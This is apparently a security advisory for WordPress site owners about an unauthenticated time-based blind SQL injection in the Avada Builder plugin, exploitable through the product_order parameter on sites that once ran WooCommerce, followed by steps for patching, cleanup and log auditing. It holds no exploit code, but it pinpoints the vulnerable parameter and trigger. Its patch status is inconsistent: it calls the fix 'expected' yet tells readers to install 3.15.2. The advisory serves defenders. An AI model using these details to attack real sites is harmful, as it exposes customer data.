If your WordPress website ever ran an online store — even one you shut down months ago — a hacker right now could be quietly reading every customer record you've ever collected, without needing a username or password to get in.
Who's at Risk — and How Many Sites Are We Talking About?
Avada is the best-selling WordPress theme of all time, and its companion Avada Builder plugin powers an estimated 900,000+ active websites worldwide. A significant portion of those sites used WooCommerce — WordPress's dominant e-commerce engine — at some point to sell products online. That's important, because this vulnerability has an unusual trigger: it activates specifically on sites where WooCommerce was previously installed and then deactivated.
Think about what that means in practice. A small business owner who tested an online store idea, decided it wasn't for them, and turned WooCommerce off — believing they'd cleaned things up — may now be sitting on an open door they don't know exists. Customer names, email addresses, hashed passwords, shipping addresses, and order histories could all be within reach of anyone who knows where to look. Every version of Avada Builder up to and including 3.15.1 is affected.
What an Attacker Actually Does — No Jargon
Here's the simple version of how this attack works. Your WordPress site, like almost every website, constantly asks its database questions: "Show me the products in this category," or "What order did this customer place last week?" Those questions are written in a language databases understand, and they're supposed to be locked down so only trusted parts of your website can send them.
The Avada Builder plugin has a flaw in how it handles a specific behind-the-scenes instruction called product_order — originally designed to sort WooCommerce products. Even after WooCommerce is gone, this instruction channel stays open. An attacker can stuff their own malicious database questions into that channel, essentially whispering instructions directly into your database's ear. Because the attack is "time-based," the attacker doesn't get results back in an obvious way — instead, they ask the database to pause for a few seconds if a piece of data is true, then measure how long the site takes to respond. Slow response? The guess was right. It's painstaking, but automated tools can rip through an entire database this way in minutes.
The scariest part: none of this requires the attacker to have an account on your site. They don't need to be a subscriber, an editor, or an administrator. They just need to find your site and send a crafted web request. That's what "unauthenticated" means in the security world — the door has no lock at all.
The Technical Anchor
Security researchers will want to note: the vulnerability is classified as a time-based blind SQL injection via unsanitized user input in the product_order parameter, caused by insufficient escaping and a lack of prepared statements in the plugin's query construction layer. It carries a CVSS score of 7.5 (HIGH) under CVE identifier CVE-2026-4798. The attack surface is exposed only when WooCommerce's database tables remain in place after deactivation — a common scenario since WooCommerce, by default, does not purge its tables on deactivation unless explicitly configured to do so.
Has Anyone Been Attacked Yet?
As of publication, there is no confirmed active exploitation in the wild, and no known victim campaigns have been publicly reported. However, the security community's experience with high-profile WordPress plugin vulnerabilities is consistent: once a CVE is public, automated scanners begin probing for vulnerable sites within 24 to 72 hours. The combination of a massive install base, an unauthenticated attack vector, and the "legacy store" trigger makes this a high-priority target for opportunistic attackers running mass-scanning campaigns.
The vulnerability was discovered through responsible disclosure processes. Avada's development team has been notified, and a patched version is expected. Site owners should not wait for attackers to catch up.
What You Need to Do Right Now — 3 Steps
- Update Avada Builder immediately to version 3.15.2 or later. Log into your WordPress dashboard, navigate to Plugins → Installed Plugins, and check for an available update to Avada Builder. If the update is not yet visible, manually check the Avada Patchstack or ThemeForest changelog pages. Do not delay this step — patching is your single most effective defense.
-
Check whether WooCommerce's database tables are still present. Even if you deactivated WooCommerce long ago, its tables likely still exist in your database. Log into your hosting control panel, open phpMyAdmin, and look for tables beginning with
wp_wc_orwp_woocommerce_. If you have no plans to use WooCommerce again, consider fully uninstalling the plugin (not just deactivating it) and using a plugin like WP-Sweep to clean orphaned database tables. This eliminates the specific condition this exploit requires. - Audit your recent database and access logs for suspicious slow queries. Time-based SQL injection attacks leave a fingerprint: repeated requests that cause unusual response delays, often targeting the same URL parameter. Ask your hosting provider for access logs from the past two weeks, or install a WordPress security plugin such as Wordfence (free tier) or Sucuri to scan for indicators of compromise. If you find evidence of probing, assume data exposure and notify affected customers in accordance with your applicable data breach regulations — GDPR in Europe, state-level laws in the US.
CVE: CVE-2026-4798 | CVSS: 7.5 HIGH | Affected versions: Avada Builder ≤ 3.15.1 | Exploitation status: No confirmed active exploitation at time of publication.